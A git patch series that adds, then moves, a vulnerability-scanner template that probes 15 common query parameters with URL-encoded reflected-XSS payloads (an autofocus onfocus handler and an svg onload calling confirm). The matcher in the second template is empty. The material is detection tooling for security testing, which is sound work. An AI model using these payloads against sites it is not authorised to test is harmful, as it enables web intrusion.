From 8f599a4c08530d66de39504025507f748f81c102 Mon Sep 17 00:00:00 2001 From: Benjamin Intfeld Date: Wed, 12 Aug 2020 22:51:22 +0200 Subject: [PATCH 1/2] added template for xss params --- vulnerabilities/top-15-xss-params.yaml | 36 ++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/top-15-xss-params.yaml diff --git a/vulnerabilities/top-15-xss-params.yaml b/vulnerabilities/top-15-xss-params.yaml new file mode 100644 index 0000000000..66101475ef --- /dev/null +++ b/vulnerabilities/top-15-xss-params.yaml @@ -0,0 +1,36 @@ +# id contains the unique identifier for the template. +id: top-15-xss-parameter + +info: + # Name is the name of the template + name: Top 15 XSS Parameter Template + # Author is the name of the author for the template + author: foulenzer + # Severity is the severity for the template. + severity: medium + # Description optionally describes the template. + description: Searches for reflected XSS in the server response via GET-requests. + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?s=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?search=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?id=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?action=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?keyword=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?query=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?page=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?keywords=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?url=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?view=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?cat=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?name=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?key=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + - "{{BaseURL}}/?p=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" + matchers: + - type: word + words: + - "'>\" 1abc" + part: body From 9ab0c904c85a0404a4c8376096e4c9635fee4035 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sat, 15 Aug 2020 14:18:23 +0530 Subject: [PATCH 2/2] updating templates --- LICENSE => LICENSE.md | 0 .../basic-xss-prober.yaml | 0 .../general-tokens.yaml | 0 generic-detections/top-15-xss.yaml | 23 ++++++++++++ vulnerabilities/top-15-xss-params.yaml | 36 ------------------- 5 files changed, 23 insertions(+), 36 deletions(-) rename LICENSE => LICENSE.md (100%) rename {basic-detections => generic-detections}/basic-xss-prober.yaml (100%) rename {basic-detections => generic-detections}/general-tokens.yaml (100%) create mode 100644 generic-detections/top-15-xss.yaml delete mode 100644 vulnerabilities/top-15-xss-params.yaml diff --git a/LICENSE b/LICENSE.md similarity index 100% rename from LICENSE rename to LICENSE.md diff --git a/basic-detections/basic-xss-prober.yaml b/generic-detections/basic-xss-prober.yaml similarity index 100% rename from basic-detections/basic-xss-prober.yaml rename to generic-detections/basic-xss-prober.yaml diff --git a/basic-detections/general-tokens.yaml b/generic-detections/general-tokens.yaml similarity index 100% rename from basic-detections/general-tokens.yaml rename to generic-detections/general-tokens.yaml diff --git a/generic-detections/top-15-xss.yaml b/generic-detections/top-15-xss.yaml new file mode 100644 index 0000000000..e5d1a667e8 --- /dev/null +++ b/generic-detections/top-15-xss.yaml @@ -0,0 +1,23 @@ +# id contains the unique identifier for the template. +id: top-15-xss + +info: + # Name is the name of the template + name: Top 15 XSS Check + # Author is the name of the author for the template + # Prams:- q, s, search, id, action, keyword, query, page, keywords, url, view, cat, p + author: foulenzer + # Severity is the severity for the template. + severity: medium + # Description optionally describes the template. + description: Searches for reflected XSS in the server response via GET-requests. + +requests: + - method: GET + path: + - "{{BaseURL}}/?q%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526s%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526search%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526id%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526action%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526keyword%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526query%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526page%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526keywords%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526url%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526view%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526cat%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526name%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526key%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E%2526p%3D%27%3E%22%3Csvg%2Fonload%3Dconfirm%28%27testing-xss%27%29%3E" + matchers: + - type: word + words: + - "" + part: body \ No newline at end of file diff --git a/vulnerabilities/top-15-xss-params.yaml b/vulnerabilities/top-15-xss-params.yaml deleted file mode 100644 index 66101475ef..0000000000 --- a/vulnerabilities/top-15-xss-params.yaml +++ /dev/null @@ -1,36 +0,0 @@ -# id contains the unique identifier for the template. -id: top-15-xss-parameter - -info: - # Name is the name of the template - name: Top 15 XSS Parameter Template - # Author is the name of the author for the template - author: foulenzer - # Severity is the severity for the template. - severity: medium - # Description optionally describes the template. - description: Searches for reflected XSS in the server response via GET-requests. - -requests: - - method: GET - path: - - "{{BaseURL}}/?q=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?s=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?search=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?id=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?action=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?keyword=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?query=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?page=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?keywords=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?url=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?view=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?cat=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?name=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?key=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - - "{{BaseURL}}/?p=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc" - matchers: - - type: word - words: - - "'>\" 1abc" - part: body